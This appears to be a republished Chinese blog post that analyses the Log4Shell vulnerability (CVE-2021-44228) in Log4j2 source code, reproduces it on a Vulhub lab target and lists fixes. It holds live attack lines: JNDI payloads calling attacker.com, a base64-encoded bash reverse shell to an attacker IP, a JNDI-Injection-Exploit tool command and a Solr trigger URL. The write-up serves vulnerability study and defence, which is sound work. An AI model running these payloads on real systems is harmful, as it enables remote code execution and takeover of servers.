CVE-2021-44228源碼分析與漏洞復現

漏洞概述

漏洞名稱:Apache Log4j2 遠程代碼執行漏洞
漏洞編號:CVE-2021-44228
CVSS 評分:10.0
影響版本:Apache Log4j 2.0-beta9 至 2.14.1
修復版本:2.15.0、2.16.0

CVE-2021-44228 是 Apache Log4j2 日志框架中因 JNDI 功能未安全過濾用戶輸入導致的遠程代碼執行漏洞。攻擊者通過構造包含惡意 JNDI 查詢的字符串(如 ${jndi:ldap://attacker.com/Exploit}),當該字符串被 Log4j2 記錄到日志時,觸發 JNDI 解析邏輯,從攻擊者控制的服務器加載并執行惡意代碼,最終完全控制目標系統。


技術細節與源碼分析

1. 漏洞成因**

Log4j2 的 消息查找替換功能(Message Lookup)允許在日志消息中動態解析變量(如 ${env:USER})。攻擊者通過注入 ${jndi:ldap://惡意URL},觸發 Log4j2 的 JndiLookup 類解析 JNDI 請求,從而加載遠程惡意代碼。關鍵問題包括:

  1. 未驗證輸入來源:日志消息中的用戶輸入未過濾 JNDI 協議;
  2. 默認啟用高危功能:Log4j2 默認啟用 JNDI 和消息查找功能。
2. 關鍵源碼分析
1. 日志記錄入口:用戶輸入被記錄

場景示例
假設用戶發送 HTTP 請求,請求頭中包含惡意 Payload:

GET /vulnerable-page HTTP/1.1  
User-Agent: ${jndi:ldap://attacker.com/Exploit}  

應用程序使用 Log4j2 記錄請求頭:

logger.info("Received request from User-Agent: {}", userAgent);  

此時,userAgent 的值為 ${jndi:ldap://attacker.com/Exploit}


2. 日志消息解析:MessagePatternConverter.format()

代碼路徑org.apache.logging.log4j.core.pattern.MessagePatternConverter#format
關鍵邏輯

 @Overridepublic void format(final LogEvent event, final StringBuilder toAppendTo) {final Message msg = event.getMessage();if (msg instanceof StringBuilderFormattable) {final boolean doRender = textRenderer != null;final StringBuilder workingBuilder = doRender ? new StringBuilder(80) : toAppendTo;if (msg instanceof MultiFormatStringBuilderFormattable) {((MultiFormatStringBuilderFormattable) msg).formatTo(formats, workingBuilder);} else {((StringBuilderFormattable) msg).formatTo(workingBuilder);}if (doRender) {textRenderer.render(workingBuilder, toAppendTo);}return;}if (msg != null) {String result;if (msg instanceof MultiformatMessage) {result = ((MultiformatMessage) msg).getFormattedMessage(formats);} else {result = msg.getFormattedMessage();// 觸發消息格式化}if (result != null) {toAppendTo.append(result);} else {toAppendTo.append("null");}}}

作用

  • 調用 Message.getFormattedMessage() 解析消息中的占位符(如 ${jndi:...})。
  • 漏洞觸發點:若消息包含 ${} 表達式,Log4j2 默認會解析其中的動態內容。

3. 占位符替換:StrSubstitutor.replace()

代碼路徑org.apache.logging.log4j.core.lookup.StrSubstitutor#replace
關鍵邏輯

public String replace(final LogEvent event, final String source) {if (source == null) {return null;}final StringBuilder buf = new StringBuilder(source);try {if (!substitute(event, buf, 0, source.length())) {// 解析占位符 return source;}} catch (Throwable t) {return handleFailedReplacement(source, t);}return buf.toString();}

substitute 函數:

private int substitute(final LogEvent event, final StringBuilder buf, final int offset, final int length,List<String> priorVariables) {.......if (priorVariables == null) {priorVariables = new ArrayList<>();}final StringBuilder bufName = new StringBuilder(varNameExpr);substitute(event, bufName, 0, bufName.length(), priorVariables);//調用resolveVariable()varNameExpr = bufName.toString();}pos += endMatchLen;final int endPos = pos;String varName = varNameExpr;String varDefaultValue = null;.......}

解析流程

  1. 檢測 ${:掃描字符串中的 ${ 符號。
  2. 提取表達式:截取 ${jndi:ldap://attacker.com/Exploit}
  3. 調用 resolveVariable():解析表達式中的 jndi 前綴。

4. resolveVariable()接口

關鍵邏輯

  protected String resolveVariable(final LogEvent event, final String variableName, final StringBuilder buf,final int startPos, final int endPos) {final StrLookup resolver = getVariableResolver();if (resolver == null) {return null;}try {return resolver.lookup(event, variableName);// 調用 JndiLookup.lookup()} catch (Throwable t) {StatusLogger.getLogger().error("Resolver failed to lookup {}", variableName, t);return null;}}

步驟分解

  • 提取前綴:從 ${jndi:ldap://...} 中提取 jndi
  • 調用 JndiLookup:執行 JndiLookup.lookup() 方法。

5. JNDI 查詢:JndiLookup.lookup()

代碼路徑org.apache.logging.log4j.core.lookup.JndiLookup#lookup
關鍵邏輯

 @Overridepublic String lookup(final LogEvent event, final String key) {if (key == null) {return null;}final String jndiName = convertJndiName(key);// 轉換為合法 JNDI 名稱try (final JndiManager jndiManager = JndiManager.getDefaultManager()) {return Objects.toString(jndiManager.lookup(jndiName), null);// 發起 JNDI 查詢} catch (final NamingException e) {LOGGER.warn(LOOKUP, "Error looking up JNDI resource [{}].", jndiName, e);return null;}}

漏洞根源

  • jndiManager.lookup():直接調用 Java 原生 javax.naming.InitialContext.lookup()
  • 協議濫用:支持 ldaprmi 等遠程協議,允許加載外部類。

6. 遠程類加載與代碼執行

攻擊鏈完成

  1. LDAP 服務器響應:攻擊者的 LDAP 服務器返回指向 http://attacker.com/Exploit.class 的引用。
  2. 類加載觸發:目標服務器通過 URLClassLoader 加載遠程類。
  3. 靜態代碼塊執行:惡意類的靜態代碼塊中執行 Runtime.getRuntime().exec("惡意命令")

完整調用鏈圖示
[用戶輸入]  ↓  
MessagePatternConverter.format()  ↓  
Message.getFormattedMessage()  ↓  
StrSubstitutor.replace()  ↓  
JndiLookup.lookup()  ↓  
JndiManager.lookup()  ↓  
javax.naming.InitialContext.lookup()  ↓  
LDAP/RMI 遠程類加載 → RCE  

漏洞復現

環境搭建
1.使用 Vulhub 環境啟動漏洞靶機
 docker-compose up -d

在這里插入圖片描述

2.訪問訪問 http://target:8983,確認服務正常運行

在這里插入圖片描述

攻擊步驟(反彈shell)
1.下載攻擊工具
2.生成payload
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTAyLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTAyLzY2NjYgMD4mMQ==bash -i >& /dev/tcp/192.168.1.102/6666 0>&1的base64編碼(換成自己攻擊機的ip和監聽端口)

3.開啟監聽

在這里插入圖片描述

4.使用工具

進入tools目錄,執行命令

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTAyLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" -A 192.168.1.1
//192.168.1.1換為執行該命令的主機ip

在這里插入圖片描述

  • 觸發漏洞
http://192.168.1.100:8983/solr/admin/cores?action=${jndi:rmi://192.168.1.1:1099/r10kqv}每個人可能不一樣,看自己工具生成的地址

在這里插入圖片描述

5.驗證

在這里插入圖片描述


修復建議

  1. 升級 Log4j2
    • 升級至 2.16.0 及以上版本(默認禁用 JNDI 和消息查找);
  2. 臨時緩解措施
    • 設置 JVM 參數 -Dlog4j2.formatMsgNoLookups=true
    • 刪除 JndiLookup.class 文件(適用于舊版本);
  3. 網絡防護
    • 使用 WAF 攔截包含 ${jndi: 的請求;
    • 限制服務器對外網絡訪問(阻斷 LDAP/RMI 出站)。

總結

CVE-2021-44228 的根源在于 Log4j2 對用戶輸入的過度信任與 JNDI 功能的濫用。其利用鏈清晰、影響深遠,甚至被預測為“地方性流行病”,未來十年內仍可能影響未修復的系統。修復需結合代碼升級、網絡防護與持續監控,以應對不斷演變的攻擊手法。

參考鏈接

  1. CVE-2021-44228 漏洞復現與利用鏈分析
  2. Log4Shell 漏洞背景與全球影響
  3. Spring Boot 項目修復方案
  4. 漏洞技術細節與修復指南
  5. log4j2漏洞CVE-2021-44228復現筆記

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/907046.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/907046.shtml
英文地址,請注明出處:http://en.pswp.cn/news/907046.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

2025年Google I/O大會上,谷歌展示了一系列旨在提升開發效率與Web體驗的全新功能

每周跟蹤AI熱點新聞動向和震撼發展 想要探索生成式人工智能的前沿進展嗎&#xff1f;訂閱我們的簡報&#xff0c;深入解析最新的技術突破、實際應用案例和未來的趨勢。與全球數同行一同&#xff0c;從行業內部的深度分析和實用指南中受益。不要錯過這個機會&#xff0c;成為AI領…

【C++指南】string(三):basic_string底層原理與模擬實現詳解

. &#x1f493; 博客主頁&#xff1a;倔強的石頭的CSDN主頁 &#x1f4dd;Gitee主頁&#xff1a;倔強的石頭的gitee主頁 ? 文章專欄&#xff1a;《C指南》 期待您的關注 文章目錄 引言一、成員變量與內存管理1.1 核心成員變量1.2 內存分配策略 二、默認成員函數的實現與優化…

AWS云與第三方通信最佳實踐:安全、高效的數據交互方案

引言 在當今的云計算時代,企業經常需要在AWS云環境中存儲和處理數據,同時還需要與第三方應用或服務進行數據交互。如何安全、高效地實現這種通信是許多企業面臨的挑戰。本文將詳細探討幾種AWS云與第三方通信的方案,并分析它們的優缺點,幫助您為自己的業務場景選擇最佳解決…

AE THYRO-AX 功率控制器 THYRISTOR-LEISTUNGSSTELLER THYRISTOR POWER CONTROLLER

AE THYRO-AX 功率控制器 THYRISTOR-LEISTUNGSSTELLER THYRISTOR POWER CONTROLLER

【論文解讀】STaR:不用人類思維鏈指導,模型可以自我進化!

1st author: Eric Zelikman paper: STaR: Bootstrapping Reasoning With Reasoning | OpenReview NeurIPS 2022 code: ezelikman/STaR: Code for STaR: Bootstrapping Reasoning With Reasoning (NeurIPS 2022) 1. 當語言模型學會自我進化 Zelikman 等人提出的 STaR (Self-T…

大語言模型 19 - MCP FastAPI-MCP 實現自己的MCP服務 快速接入API

MCP 基本介紹 官方地址&#xff1a; https://modelcontextprotocol.io/introduction “MCP 是一種開放協議&#xff0c;旨在標準化應用程序向大型語言模型&#xff08;LLM&#xff09;提供上下文的方式。可以把 MCP 想象成 AI 應用程序的 USB-C 接口。就像 USB-C 提供了一種…

用Matlab對單目相機參數的標定步驟(保姆級教程)

前言 在圖像測量及機器視覺應用中&#xff0c;為確定空間物體表面某點的三維幾何位置與其在圖像中對應點之間的相互關系&#xff0c;必須建立相機成像的幾何模型&#xff0c;這些幾何模型參數就是相機參數。 ??在大多數條件下這些參數必須通過實驗與計算才能得到&#xff…

【后端高階面經:架構篇】46、分布式架構:如何應對高并發的用戶請求

一、架構設計原則:構建可擴展的系統基石 在分布式系統中,高并發場景對架構設計提出了極高要求。 分層解耦與模塊化是應對復雜業務的核心策略,通過將系統劃分為客戶端、CDN/邊緣節點、API網關、微服務集群、緩存層和數據庫層等多個層次,實現各模塊的獨立演進與維護。 1.1 …

SQL每日一題(5)

前言&#xff1a;五更&#xff01;五更琉璃&#xff01;不對&#xff01;是&#xff0c;五更佩可&#xff01; 原始數據&#xff1a; new_hires reasonother_column1other_column2校園招聘信息 11社會招聘信息 22內部推薦信息 33獵頭推薦信息 44校園招聘信息 55社會招聘信息…

Kafka Kraft模式集群 + ssl

文章目錄 啟用集群資源規劃準備證書創建相關文件夾配置文件啟動各Kafka節點 故障轉移測試spring boot集成 啟用集群 配置集群時關鍵就是提前梳理好需要的網絡資源&#xff0c;完成對應server.properties文件的配置。在執行前先把這些梳理好&#xff0c;可以方便后面的配置&…

watchEffect

在處理復雜異步邏輯時&#xff0c;Vue 3 的 watchEffect 相比傳統的 watch 具有以下優勢&#xff1a; 1. 自動追蹤依賴 watchEffect 會自動收集其回調中使用的所有響應式依賴&#xff0c;無需手動指定監聽源&#xff1a; import { ref, watchEffect } from vue;const count …

Linux系統平均負載與top、uptime命令詳解

介紹 在Linux系統運維中&#xff0c;系統平均負載是一個重要的性能指標。通過 top和 uptime命令&#xff0c;可以實時監控系統的負載情況&#xff0c;幫助運維人員及時發現并解決系統性能問題。本文將詳細介紹Linux系統平均負載的概念及其計算方法&#xff0c;并深入解析 top和…

前端配置nginx代理

一、定義靜態文件的路徑的兩種方式 1. root 指令 &#xff08;1&#xff09;作用 指定文件系統的 基礎路徑&#xff0c;location 的 URI 會 追加到該路徑后 形成完整路徑。 &#xff08;2&#xff09;語法 location /uri/ {root /path/to/files; } &#xff08;3&#xf…

語音識別技術在人工智能中的應用

姓名&#xff1a;成杰 學號&#xff1a;21021210653 學院&#xff1a;電子工程學院 【嵌牛導讀】 應用語音智能這項識別技術是為了使計算機可以聽懂人類的語言&#xff0c;并執行人類的某項操作。現階段這項技術已經成為人工智能領域的重點研究方向和實現人機語音交互的…

uniapp實現大視頻文件上傳-- 阿里云oss直傳方式 - app、H5、微信小程序

之前的項目文件上傳比較慢&#xff0c;使用預簽名方式上傳H5正常&#xff0c;微信小程序和app使用axios時出現了各種報錯&#xff0c;配置完后還是不行。所以換一種oss直傳方式。 找到一個 實現了的 參考:https://blog.csdn.net/qq_44860866/article/details/129670188

【Java學習筆記】抽象類

抽象類 引入關鍵字&#xff1a;abstract 應用場景&#xff1a;當子類中共有的部分 / 特性可以放到抽象類中 1. 通過子類的方法重寫實現不同的功能 2. 編寫一個方法把共有的部分放入其中&#xff0c;在該方法中調用抽象方法&#xff08;動態綁定機制&#xff09; 3. 便可以實…

EPT(Efficient Prompt Tuning)方法,旨在解決提示調優(Prompt Tuning)中效率與準確性平衡和跨任務一致性的問題

EPT(Efficient Prompt Tuning)方法,旨在解決提示調優(Prompt Tuning)中效率與準確性平衡和跨任務一致性的問題 一、核心原理:分解提示與多空間投影 1. 提示分解:用低秩矩陣壓縮長提示 傳統問題: 長提示(如100個token)精度高但訓練慢,短提示(如20個token)速度快但…

深入剖析Java中的偽共享:原理、檢測與解決方案

在高性能Java應用的開發中&#xff0c;尤其是多線程環境下&#xff0c;開發者往往會關注鎖競爭、線程調度等顯性問題&#xff0c;但有一個隱蔽的性能殺手——偽共享&#xff08;False Sharing&#xff09;?&#xff0c;卻容易被忽視。本文將通過原理分析、代碼案例與實戰工具&…

JMeter 教程:響應斷言

目錄 JMeter 教程&#xff1a;響應斷言的簡單介紹【輕松上手】 ? 什么是響應斷言&#xff1f; &#x1f4cc; 使用場景示例 &#x1f6e0;? 添加響應斷言步驟 1. 選中 HTTP 請求 → 右鍵 → Add → Assertions → Response Assertion 2. 設置斷言內容&#xff1a; ? …

11.11 TypedDict與Pydantic實戰:Python高效狀態管理秘籍

使用 TypedDict 和 Pydantic 管理狀態 關鍵詞:LangGraph 狀態管理, TypedDict 類型化字典, Pydantic 數據模型, 狀態持久化, 多輪對話設計 1. 狀態管理的核心挑戰 在復雜 AI Agent 系統中,狀態管理需要解決三個關鍵問題: #mermaid-svg-0sX3763L7VP2RvuX {font-family:&quo…